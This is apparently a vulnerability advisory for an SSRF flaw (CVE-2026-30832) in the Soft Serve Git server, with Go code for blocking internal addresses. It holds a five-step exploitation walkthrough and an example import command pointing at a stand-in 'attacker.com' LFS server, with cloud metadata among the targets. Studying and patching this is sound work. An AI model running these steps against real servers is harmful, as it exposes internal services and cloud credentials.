CVE-2026-30832 details a critical Server-Side Request Forgery (SSRF) vulnerability in Charmbracelet's Soft Serve, a self-hostable Git server. The flaw resides in the `repo import` functionality in versions from 0.6.0 up to, but not including, 0.11.4. An authenticated attacker can exploit it by running a repo import with a maliciously crafted `--lfs-endpoint` URL. When Soft Serve processes this Git LFS endpoint, it makes an initial HTTP request to the supplied URL. This first request is "blind": even if the response comes from an internal service, it will not parse as valid LFS JSON, so no data is returned to the attacker at this stage. However, an attacker who controls the external endpoint can escalate. By hosting a fake LFS server, the attacker can answer the initial batch request with a list of malicious download URLs pointing at internal or private IP addresses and services (e.g., `http://127.0.0.1/admin`, `http://10.0.0.5/internal-api`). The vulnerable Soft Serve server then makes follow-up HTTP requests to these internal targets, fetches the data, and effectively returns it to the attacker through the LFS protocol flow, granting full read access to internal services. The issue is resolved in Soft Serve version 0.11.4.
dailycve form:
Platform: Soft Serve
Version: 0.6.0 to <0.11.4
Vulnerability: Server-Side Request Forgery
Severity: Critical (9.1)
Date: March 7, 2026
Prediction: Patch already available (v0.11.4)
What Undercode Says:
Analytics:
- CWE: CWE-918 (Server-Side Request Forgery)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
- Attack Complexity: Low
- Privileges Required: Low (authenticated SSH user)
- Scope: Changed (the vulnerable server is used as a pivot into the internal network)
- Exploitability: Proof-of-concept chaining is possible with a malicious LFS server.
- Fix Commitment: Vendor (Charmbracelet) patched in v0.11.4 within days of public disclosure.
Bash Commands & Code Analysis:
```bash
# Example of a malicious import command an attacker might run
soft serve repo import --name victim-repo --lfs-endpoint "http://attacker.com/malicious-lfs" https://github.com/example/repo.git

# To check your current version
soft --version

# Update to the patched version using Go
go install github.com/charmbracelet/soft-serve/cmd/soft@v0.11.4

# Or if installed via package manager (example for Debian/Ubuntu)
sudo apt update && sudo apt upgrade soft-serve

# Check running processes for Soft Serve to confirm version
ps aux | grep soft-serve
```
How to Exploit:
1. Authenticate: Gain valid SSH access to the Soft Serve server.
2. Craft Endpoint: Set up a public server with a malicious LFS endpoint that returns HTTP redirects or download URLs pointing to internal targets (e.g., `http://169.254.169.254/latest/meta-data/` for cloud metadata).
3. Trigger Import: Run `soft serve repo import` with the `--lfs-endpoint` argument pointing to the malicious server.
4. Chain Request: The fake LFS server responds to the batch request with a download URL targeting an internal service.
5. Exfiltrate: Soft Serve fetches the internal resource and the attacker reads the data via the LFS protocol.
Protection from this CVE:
- Patch Immediately: Upgrade to Soft Serve version 0.11.4 or later.
- Network Segmentation: Restrict outbound HTTP traffic from the Soft Serve server to the internal network if not strictly necessary.
- Input Validation: As a defense-in-depth measure, ensure no internal IP ranges or `localhost` can be specified in LFS endpoints (though the patch addresses this at the source).
- Monitor Logs: Review Soft Serve logs for `repo import` commands with suspicious `--lfs-endpoint` URLs pointing to external IPs.
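As an added example (not Soft Serve's own code and not part of the advisory), the following Go program shows the defense-in-depth check the "Input Validation" bullet above describes, applied at both stages of the LFS flow from the description: the user-supplied `--lfs-endpoint` URL, and every download URL or redirect that the batch response points at. All function and variable names (`isPublicIP`, `resolveHost`, `validateEndpoint`, `safeDial`, `newSafeClient`, `lookupIP`) are hypothetical, and the sample URLs are constructed, with 203.0.113.10 (TEST-NET-3) standing in for a genuinely external host. It goes one step beyond the page: instead of checking the URL once up front, it re-checks the resolved address at dial time, so a DNS name whose answer changes between check and connect cannot slip through.

```go
package main

import (
	"context"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"time"
)

// DNS hook kept as a package variable so tests can substitute a fixed table.
var lookupIP = net.LookupIP

// isPublicIP rejects loopback, RFC 1918, link-local (which includes the cloud metadata
// address 169.254.169.254), multicast and unspecified; CGNAT 100.64/10 etc. would need a CIDR list.
func isPublicIP(ip net.IP) bool {
	if v4 := ip.To4(); v4 != nil {
		ip = v4 // unmaps ::ffff:a.b.c.d so the IPv4 checks apply
	}
	return !(ip.IsUnspecified() || ip.IsLoopback() || ip.IsPrivate() ||
		ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() || ip.IsMulticast())
}

// resolveHost returns the addresses of a literal IP or a DNS name and fails closed
// if any of them is non-public, so a public/internal mix is rejected outright.
func resolveHost(host string) ([]net.IP, error) {
	var err error
	ips := []net.IP{net.ParseIP(host)}
	if ips[0] == nil { // not a literal: consult DNS
		ips, err = lookupIP(host)
	}
	if err != nil || len(ips) == 0 {
		return nil, fmt.Errorf("cannot resolve %q: %v", host, err)
	}
	for _, ip := range ips {
		if !isPublicIP(ip) {
			return nil, fmt.Errorf("host %q resolves to non-public address %s", host, ip)
		}
	}
	return ips, nil
}

// validateEndpoint is the pre-flight check for a user-supplied URL such as an
// --lfs-endpoint value: http(s) only, a host present, every address public.
func validateEndpoint(raw string) (*url.URL, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if (u.Scheme != "http" && u.Scheme != "https") || u.Hostname() == "" {
		return nil, fmt.Errorf("endpoint must be an http(s) URL with a host: %q", raw)
	}
	if _, err := resolveHost(u.Hostname()); err != nil {
		return nil, err
	}
	return u, nil
}

// safeDial re-resolves and re-checks at connect time and dials the vetted address
// itself, closing the DNS-rebinding window that a pre-flight check alone leaves open.
func safeDial(ctx context.Context, network, addr string) (net.Conn, error) {
	host, port, err := net.SplitHostPort(addr)
	if err != nil {
		return nil, err
	}
	ips, err := resolveHost(host)
	if err != nil {
		return nil, err
	}
	d := &net.Dialer{Timeout: 10 * time.Second}
	return d.DialContext(ctx, network, net.JoinHostPort(ips[0].String(), port))
}

// newSafeClient is the client for the LFS batch request and the download URLs it returns:
// every connection (redirects included) goes through safeDial, each redirect target is
// validated first, and Proxy is nil so no environment proxy setting bypasses the dialer.
func newSafeClient() *http.Client {
	return &http.Client{
		Timeout:   30 * time.Second,
		Transport: &http.Transport{DialContext: safeDial, Proxy: nil},
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= 5 {
				return fmt.Errorf("stopped after %d redirects", len(via))
			}
			_, err := validateEndpoint(req.URL.String())
			return err
		},
	}
}

func main() {
	// Constructed samples: the internal targets named above plus a TEST-NET-3 address.
	for _, raw := range []string{"http://127.0.0.1/admin", "http://10.0.0.5/internal-api",
		"http://169.254.169.254/latest/meta-data/", "http://[::1]/", "http://203.0.113.10/lfs"} {
		_, err := validateEndpoint(raw)
		fmt.Printf("%-42s allowed=%v %v\n", raw, err == nil, err)
	}
}
```

The pre-flight check alone is the weak form of this mitigation: a hostname can resolve to a public address when validated and to 10.0.0.5 when the connection is made, which is why the same check runs again inside the dialer and the dialer connects to the exact address it vetted. Production code would also add an explicit CIDR list for ranges that `net.IP`'s predicates do not cover (CGNAT 100.64.0.0/10, reserved and documentation space) and keep the network-segmentation control from the bullet above as the layer that holds when the application check is bypassed.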
Impact:
- Confidentiality (High): An attacker can read arbitrary data from internal web services, including cloud metadata (IAM credentials), internal dashboards, and API endpoints.
- Lateral Movement: The SSRF can be used to scan and map the internal network, identifying live hosts and vulnerable services behind the firewall.
- Integrity (Low): Potential to trigger POST requests against internal APIs that are unauthenticated or weakly authenticated, though the primary vector is read-only.
- Availability (Low): Could potentially send requests that crash internal services, leading to denial of service.
Sources:
Reported By: nvd.nist.gov